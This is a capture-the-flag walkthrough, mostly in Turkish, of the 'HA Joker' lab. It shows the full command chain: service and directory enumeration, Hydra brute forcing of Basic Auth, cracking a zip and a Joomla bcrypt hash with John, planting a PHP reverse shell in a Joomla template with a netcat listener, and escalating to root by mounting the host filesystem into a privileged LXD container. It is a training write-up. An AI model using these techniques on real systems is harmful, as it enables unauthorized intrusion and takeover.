HA Joker CTF
We have developed this lab for the purpose of online penetration practices. Solving this lab is not that tough if you have proper basic knowledge of Penetration testing. Let’s start and learn how to breach it.
Enumerate Services
- Nmap Bruteforce
- Performing Bruteforce on files over http
- Performing Bruteforce on Basic Authentication Hash Crack
- Performing Bruteforce on hash to crack zip file
- Performing Bruteforce on hash to crack mysql user Exploitation
- Getting a reverse connection
- Spawning a TTY Shell Privilege Escalation
- Get root taking advantage of flaws in LXD
Enumerate services on target machine.
nmap komutu:
1
2
┌──(root㉿kali)-[~]
└─# nmap -T4 -sV 10.10.86.1
nmap sonucu:
1
2
3
4
5
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
8080/tcp open http Apache httpd 2.4.29
Service Info: Host: localhost; OS: Linux; CPE: cpe:/o:linux:linux_kernel
What version of Apache is it?
2.4.29
What port on this machine not need to be authenticated by user and password?
username ve password istemeyen tek port 80 portu.
There is a file on this port that seems to be secret, what is it?
Dizin taraması yapalım.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
┌──(root㉿kali)-[~]
└─# gobuster dir --wordlist=/usr/share/wordlists/dirb/common.txt --url http://10.10.86.1 -t 40 -x php,txt,html
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.86.1
[+] Method: GET
[+] Threads: 40
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: html,php,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 275]
/.html (Status: 403) [Size: 275]
/.php (Status: 403) [Size: 275]
/.hta.php (Status: 403) [Size: 275]
/.hta.html (Status: 403) [Size: 275]
/.htaccess (Status: 403) [Size: 275]
/.hta.txt (Status: 403) [Size: 275]
/.htaccess.html (Status: 403) [Size: 275]
/.htaccess.php (Status: 403) [Size: 275]
/.htpasswd.php (Status: 403) [Size: 275]
/.htpasswd (Status: 403) [Size: 275]
/.htpasswd.txt (Status: 403) [Size: 275]
/.htpasswd.html (Status: 403) [Size: 275]
/.htaccess.txt (Status: 403) [Size: 275]
/css (Status: 301) [Size: 306] [--> http://10.10.86.1/css/]
/img (Status: 301) [Size: 306] [--> http://10.10.86.1/img/]
/index.html (Status: 200) [Size: 5954]
/index.html (Status: 200) [Size: 5954]
/phpinfo.php (Status: 200) [Size: 94740]
/secret.txt (Status: 200) [Size: 320]
/server-status (Status: 403) [Size: 275]
Progress: 18456 / 18460 (99.98%)
===============================================================
Finished
===============================================================
secret.txt
There is another file which reveals information of the backend, what is it?
phpinfo.php
When reading the secret file, We find with a conversation that seems contains at least two users and some keywords that can be intersting, what user do you think it is?
joker
What port on this machine need to be authenticated by Basic Authentication Mechanism?
8080
At this point we have one user and a url that needs to be aunthenticated, brute force it to get the password, what is that password?
kullanıcı adının joker olduğunu biliyoruz. Hydra ile brute force saldırısı başlatalım.
1
2
┌──(root㉿kali)-[~]
└─# hydra -l joker -P /usr/share/wordlists/rockyou.txt -s 8080 10.10.86.1 http-get
hannah
Yeah!! We got the user and password and we see a cms based blog. Now check for directories and files in this port. What directory looks like as admin directory?
/robots.txt dosyasına baktığımzda dizinleri görebiliyoruz.
/administrator/ dizininde Joomla login paneli var.
/adminisitrator/
We need access to the administration of the site in order to get a shell, there is a backup file, What is this file?
Bir backup dosyası olduğu söylenmiş. Gobuster ile siteyi tarayalım.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
┌──(root㉿kali)-[~]
└─# gobuster dir -U joker -P hannah -u http://10.10.86.1:8080/ -x bak,old,tar,gz,tgz,zip,7z -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.86.1:8080/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Auth User: joker
[+] Extensions: tgz,zip,7z,bak,old,tar,gz
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 277]
/.hta.gz (Status: 403) [Size: 277]
/.hta.tgz (Status: 403) [Size: 277]
/.hta.zip (Status: 403) [Size: 277]
/.hta.7z (Status: 403) [Size: 277]
/.hta.bak (Status: 403) [Size: 277]
/.hta.old (Status: 403) [Size: 277]
/.htaccess (Status: 403) [Size: 277]
/.hta.tar (Status: 403) [Size: 277]
/.htaccess.7z (Status: 403) [Size: 277]
/.htaccess.bak (Status: 403) [Size: 277]
/.htaccess.old (Status: 403) [Size: 277]
/.htaccess.tar (Status: 403) [Size: 277]
/.htaccess.tgz (Status: 403) [Size: 277]
/.htaccess.gz (Status: 403) [Size: 277]
/.htaccess.zip (Status: 403) [Size: 277]
/.htpasswd (Status: 403) [Size: 277]
/.htpasswd.old (Status: 403) [Size: 277]
/.htpasswd.tar (Status: 403) [Size: 277]
/.htpasswd.tgz (Status: 403) [Size: 277]
/.htpasswd.zip (Status: 403) [Size: 277]
/.htpasswd.gz (Status: 403) [Size: 277]
/.htpasswd.bak (Status: 403) [Size: 277]
/.htpasswd.7z (Status: 403) [Size: 277]
/administrator (Status: 301) [Size: 323] [--> http://10.10.86.1:8080/administrator/]
/backup (Status: 200) [Size: 12133560]
/bin (Status: 301) [Size: 313] [--> http://10.10.86.1:8080/bin/]
/backup.zip (Status: 200) [Size: 12133560]
/cache (Status: 301) [Size: 315] [--> http://10.10.86.1:8080/cache/]
/components (Status: 301) [Size: 320] [--> http://10.10.86.1:8080/components/]
Progress: 12169 / 36920 (32.96%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 12219 / 36920 (33.10%)
===============================================================
Finished
===============================================================
backup.zip
We have the backup file and now we should look for some information, for example database, configuration files, etc … But the backup file seems to be encrypted. What is the password?
Dosyayı indirelim.
Dosya şifrelenmiş. zip2john ile hash’ini alalım.
1
2
┌──(root㉿kali)-[~/Downloads]
└─# zip2john backup.zip > hash.txt
Ardından john ile şifreyi kıralım.
1
2
3
4
5
6
7
8
9
10
┌──(root㉿kali)-[~/Downloads]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
hannah (backup.zip)
1g 0:00:00:00 DONE (2024-05-05 19:26) 100.0g/s 819200p/s 819200c/s 819200C/s 123456..whitetiger
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
hannah
Remember that… We need access to the administration of the site… Blah blah blah. In our new discovery we see some files that have compromising information, maybe db? ok what if we do a restoration of the database! Some tables must have something like user_table! What is the super duper user?
db klasörünün içinde sql dosyası var.
1
2
┌──(root㉿kali)-[~/Downloads/backup/db]
└─# cat joomladb.sql | grep user
1
2
INSERT INTO `cc1gr_users` VALUES (547,'Super Duper User','admin','admin@example.com','$2y$10$b43UqoH5UpXokj2y9e/8U.LD8T3jEQCuxG2oHzALoJaj9M5unOcbG',0,1,'2019-10-08 12:00:15','2019-10-25 15:20:02','0','{\"admin_style\":\"\",\"admin_language\":\"\",\"language\":\"\",\"editor\":\"\",\"helpsite\":\"\",\"timezone\":\"\"}','0000-00-00 00:00:00',0,'','',0);
/*!40000 ALTER TABLE `cc1gr_users` ENABLE KEYS */;
admin
Super Duper User! What is the password?
admin kullanıcısının şifresini hash olarak bulduk. Hash’i kıralım.
1
2
3
4
5
6
7
8
9
10
11
┌──(root㉿kali)-[~/Desktop]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
abcd1234 (?)
1g 0:00:00:06 DONE (2024-05-05 19:32) 0.1451g/s 151.5p/s 151.5c/s 151.5C/s bullshit..piolin
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
abcd1234
At this point, you should be upload a reverse-shell in order to gain shell access. What is the owner of this session?
admin:abcd1234 ile giriş yapabiliriz.
Configuration -> Templates -> Templates -> Beez3 Details and Files -> error.php dosyasına giderek php reverse shell ekledim.
netcat çalıştıralım.
1
nc -nvlp 1234
Ardından değiştirdiğimiz error.php dosyasına gittiğimizde shell’imiz gelecek.
/templates/beez3/error.php
This user belongs to a group that differs on your own group, What is this group?
1
2
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data),115(lxd)
lxd
Spawn a tty shell.
python3 -c "import pty;pty.spawn('/bin/bash')"
In this question you should be do a basic research on how linux containers (LXD) work, it has a small online tutorial. Googling “lxd try it online”.
https://linuxcontainers.org/lxd/introduction/
Research how to escalate privileges using LXD permissions and check to see if there are any images available on the box.
Hint:If there isn’t an image already on the box, you may need to upload one…
The idea here is to mount the root of the OS file system on the container, this should give us access to the root directory. Create the container with the privilege true and mount the root file system on /mnt in order to gain access to /root directory on host machine.
1
2
3
4
5
6
7
www-data@ubuntu:/$ lxc image list
lxc image list
+-------+--------------+--------+------------------------------------+--------+--------+------------------------------+
| ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCH | SIZE | UPLOAD DATE |
+-------+--------------+--------+------------------------------------+--------+--------+------------------------------+
| | a8258f4a885f | no | Alpine 3.10 amd64 (20191025_13:00) | x86_64 | 2.39MB | Oct 25, 2019 at 8:07pm (UTC) |
+-------+--------------+--------+------------------------------------+--------+--------+------------------------------+
Image yok, eklememiz gerekecek.
1
2
3
git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine
Oluşturulan dosyayı makineye transfer edelim.
1
python3 -m http.server 8080 -> KALI
1
wget http://10.9.0.137/alpine-v3.19-x86_64-20240505_1945.tar.gz -> MACHINE
1
2
3
4
5
6
7
8
9
www-data@ubuntu:/tmp$ lxc image import alpine-v3.19-x86_64-20240505_1945.tar.gz --alias myalpine
<-v3.19-x86_64-20240505_1945.tar.gz --alias myalpine
www-data@ubuntu:/tmp$ lxc image list
lxc image list
+----------+--------------+--------+-------------------------------+--------+--------+-----------------------------+
| ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCH | SIZE | UPLOAD DATE |
+----------+--------------+--------+-------------------------------+--------+--------+-----------------------------+
| myalpine | 2beab7563005 | no | alpine v3.19 (20240505_19:45) | x86_64 | 3.48MB | May 5, 2024 at 7:54pm (UTC) |
+----------+--------------+--------+-------------------------------+--------+--------+-----------------------------+
1
2
3
4
5
6
7
8
9
10
11
12
13
www-data@ubuntu:/tmp$ lxc init myalpine joker -c security.privileged=true
lxc init myalpine joker -c security.privileged=true
Creating joker
www-data@ubuntu:/tmp$ lxc config device add joker mydevice disk source=/ path=/mnt/root recursive=true
<ydevice disk source=/ path=/mnt/root recursive=true
Device mydevice added to joker
www-data@ubuntu:/tmp$ lxc start joker
lxc start joker
www-data@ubuntu:/tmp$ lxc exec joker /bin/sh
lxc exec joker /bin/sh
~ # whoami
whoami
root
What is the name of the file in the /root directory?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
/mnt/root/root # ls -la
ls -la
total 40
drwx------ 5 root root 4096 Oct 25 2019 .
drwxr-xr-x 22 root root 4096 Oct 22 2019 ..
-rw------- 1 root root 40 Oct 25 2019 .bash_history
-rw-r--r-- 1 root root 3106 Apr 9 2018 .bashrc
drwx------ 2 root root 4096 Oct 22 2019 .cache
drwxr-x--- 3 root root 4096 Oct 24 2019 .config
drwxr-xr-x 3 root root 4096 Oct 8 2019 .local
-rw------- 1 root root 33 Oct 24 2019 .mysql_history
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 1003 Oct 8 2019 final.txt
/mnt/root/root # cat final.txt
cat final.txt
██╗ ██████╗ ██╗ ██╗███████╗██████╗
██║██╔═══██╗██║ ██╔╝██╔════╝██╔══██╗
██║██║ ██║█████╔╝ █████╗ ██████╔╝
██ ██║██║ ██║██╔═██╗ ██╔══╝ ██╔══██╗
╚█████╔╝╚██████╔╝██║ ██╗███████╗██║ ██║
╚════╝ ╚═════╝ ╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝
!! Congrats you have finished this task !!
Contact us here:
Hacking Articles : https://twitter.com/rajchandel/
Aarti Singh: https://in.linkedin.com/in/aarti-singh-353698114
final.txt
This post is licensed under CC BY 4.0 by the author.